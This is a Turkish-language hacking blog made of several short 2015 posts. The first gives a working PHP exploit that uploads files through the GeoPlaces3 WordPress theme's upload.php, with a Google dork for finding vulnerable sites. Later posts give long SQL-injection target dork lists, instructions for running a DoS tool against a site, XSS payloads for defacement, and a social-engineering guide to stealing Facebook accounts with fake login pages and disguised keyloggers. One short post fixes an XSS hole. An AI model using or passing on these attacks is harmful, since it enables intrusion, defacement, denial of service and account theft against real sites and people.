15 Kasım 2015 Pazar

WordPress GeoPlaces3 Tasarımındaki Açık

Google Dork: inurl:/wp-content/themes/GeoPlaces3/
# Tasarımın Sitesi: http://templatic.com/app-themes/geo-places-city-directory-wordpress-theme

Exploit : wp-content/themes/GeoPlaces3/library/includes/upload.php       wp-content/themes/GeoPlaces3/library/includes/upload_3feb.php
Dizin    : /wp-content/uploads/tmp/

<?php
  
$uploadfile="m.jpg";
$ch =
curl_init("https://server/wp-content/themes/GeoPlaces3/library/includes/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
  
?>

WE ARE : SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
 
GREETS TO: Gantengers Crew - Indonesian Defacer - Indonesian Cyber Army - Defacer Tersakiti Team - Suram Crew - Surabaya BlackHat - AND All Moeslim Defacer

Bu açığı kullanmanız durumunda her hangi bir sorumluluk kabul etmemekteyim.

14 Kasım 2015 Cumartesi

XSS Açığı Kapatma -Fixleme-


Bir önceki yazımda XSS açıklarından bahsettik. Bu yazımda fixlenmesinden bahsedeceğim. XSS açıklı basit bir script yazdım. Bu kodları index.php ye yazıp kaydetip açın.
<html>
<head>
<title>XSS Tespit</title>
</head>
<body>

<form action="index.php" method="post">
 Yaz: <br/>
 <input type="text" name="a" /><br/>
 <input type="submit" value="Formu gönder" />
</form>



</body>
</html>
<?php 
$a = $_POST["a"];
echo $a ;

?>




Bu şekilde bir sayfa gelecektir. Buraya örneğin <b>Deneme yazarsanız kalın olarak deneme yazacaktır. 

Gördüğünüz gibi kalın olarak Deneme yazdı. Yani html ve javascript kodları süzülmeden direk olarak sunucuya gönderiliyor. Yani <b> gibi kodlar yazı yerine kod olarak algılanıyor. Buda xss açığı oluşturuyor.

$a = htmlspecialchars($_POST["a"]);

Şeklinde $a değişkenine htmlspecialchars ekleyerek deniyelim birde.



Gördüğünüz gibi <b>Deneme deki <b> yi yazı olarak algıladı kod olarak değil. 

SQL Açığı Nedir, Nasıl Tespit Edilir ve Güncel Dorklar


1-) SQL Nedir ? 

SQL veritabanıdır. Yazılar, üyelik bilgileri vs burada depolanır. SQL açığından faydalanarak bir web sitesinin yazısını silebilir yönetici kullanıcı adı ve şifresini alarak yönetim paneline girebilirsiniz.

2-) SQL Açığı Tespiti 

Hedef sitede ararken sitedeki search.php post.php gibi dosyalarda denenebilir. Örneğin post.php?id=25 şeklindeki get ile parametre gönderilen linkte id si 25 e eşit olan yazıyı göster demektir. siteadi.com/yazi-adi şeklinde htaccess link yapısı ile çevirilir. Aslında post.php?id=25 şeklinde bir linktir(örnek verdim). Buradaki post.php?id=25 e 25' şeklinde yazdığımızda hata ile karşılaşıyorsanız o sitede sql açığı vardır demektir. SQLe ' tırnak sorgusu direk giderse hata verir. Ama belirli güvenlik önlemleri ile engelleyebilirsiniz.

Googlede dorklar ilede bulabilmemiz mümkün. Güncel sql dorkları listesi:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid= inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id= inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num= inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id= inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id= inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id= inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?idinurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id= inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id= inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id= inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr= inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?idinurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id= inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?idinurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id= inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?idinurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid= inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat= inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurlreview.php?id= inurl:loadpsb.php?id=
inurlages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id= inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id= inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id= inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l= inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf= inurl:art.php?idm=
inurl:title.php?id=
inurlden sonra "gov.fr" gibi uzantılar ekleyerek hedef ülke seçebilirsiniz. 

Anonymous Doser -Dos- Kullanımı


Daha önce en etkili ddos yöntemlerini anlatmıştım. Bu yazımda ddos programı göstereceğim. Kullandığınızda doğacak hiç bir sonuçtan ben sorumlu değilim.

İlk önce hedeflenen siteye ping atarak ip adresini tespit edin. Sonrasında anonymous dosere ip adresini girin. Kısa bir süre isteyecektir ve sonrasında istediği süre kısmına istediğiniz kadar süre yazabilirsiniz.



Hack İndexlerinde Kullanılabilecek Şarkılar

_hI" frameborder="0" allowfullscreen>

XSS Açıği


1-) XSS Nedir ?

XSS diğer adıyla css(Cascading Style Sheet ile karıştırılan Cross Site Scripting)  web uygulamalarında sıklıkla karşılaşılan bir açıktır. XSS saldırısı web sitesine kötü niyetli kodlar eklemektir. XSS saldırılarının bir çok çeşidi mevcuttur. Ben en önemlilerinden bahsedeceğim. Burada anlattığım bilgileri kullanmanız dahilinde oluşacak hiç bir sorumluluğu kabul etmemekteyim.

2-) XSS Açıklarını Bulma

Bu açıkları blogları ve forumları gezerek yada google dork ile bulmanız mümkün. <s c r i p t>alert("xss")</s c r i p t>  bu kodu web sitelerinin genellikle yorum alanlarına yazdığınızda XSS yazan bir popup penceresi açılırsa o sitede xss açığı vardır demektir. Bu açık genelde özel blog scriptlerinde oluşan bir açıktır. Bahsettiğim dorku kullanalım.

http://site.com/search.php?q=<s c r i p t>alert("xss")</s c r i p t>

3-) Saldırı Yöntemleri

Artık xss nin ne olduğunu nasıl bulacağımızı öğrendiğimize göre saldırı yöntemlerini öğrenme zamanımız geldi. İmg src(htmlde resim ekleme kodu) en etkili saldırı yöntemlerinden birisidir.

<html><b o d y><IMG src= "http://site.com/yourDefaceIMAGE.png">

Şeklinde kullanılabilir. Yada meta tag ile yönlendirme atabilirsiniz.



13 Kasım 2015 Cuma

Sosyal Mühendislik İle Facebook Hacklemek

Merhaba Değerli Okuyucularım,

Bu yazıdaki taktikleri kullanmanız sonucunda olacaklardan ben sorumlu değilim.
Filmlerdeki gibi yeşil yazıların bulunduğu konsola bir kaç satır kod girerek facebook hackleme olaylarına kendini kaptırarak facebook hacklemek isteyen kişiler için yazıyorum bu yazıyı. Öncelikle facebookta hesap çalma diye bir şey yoktur. Facebookta hesabın bilgilerini direk kullanıcıdan almak vardır.

Nedir Bu Sosyal Mühendislik ? 

Sosyal mühendislik aldatma yöntemidir. İnsanlar güvenir ve inanırlar. Sosyal mühendislik ile her türlü bilgiyi siteyi hackliyebilirsiniz. Sosyal mühendislik taktiğinde karşıdaki kişinin sevdiği şeyleri, ilgi alanlarını, hobilerini bilmemiz gerekli.


Sosyal mühendisliği kullanarak nasıl hackliyeceğiz ? 

Evet asıl konumuz bu. Diyelim ki tokyo drift filminin hayranı kurbanımız. O zaman tokyo driftte en çok gündemdeki başlıkları bulmamız gerekli. Tokyo driftte ki Han adlı oyuncu öldü ölmedi konusu çok gündemdeydi. Free domain yada ücretli bir alan adına Fake Facebook Scripti ini kuracaksınız. Sonrasında kurbanımıza bak kanka tokyo driftteki hanın ölüm hanını facebookta paylaşmışlar diceksiniz. Sonrasında zaten kurban numarayı yutacaktır.

Diğer bir taktiğimiz keylogger yöntemidir. Keylogger yedirmek ustalık gerektirir. Karşıdaki kullanıcının profilini gezin. Örneğin minecraft delisi bir kurbanımız var. Ona minecraft para hilesi diyerek yedirebilirsiniz. Veya cs:go delisi bir kurbanımız var. Ona cs:go skin hilesi bak kanka kendim yazdım bir test etsene ya bende cs:go yok diyerek yutturabilirsiniz.


Dip not: İllegale kaçacağından keylogger tanıtımı yapmadım yada link vermedim. Hakops keylogger yada dark comet rat keyloggeri öneririm.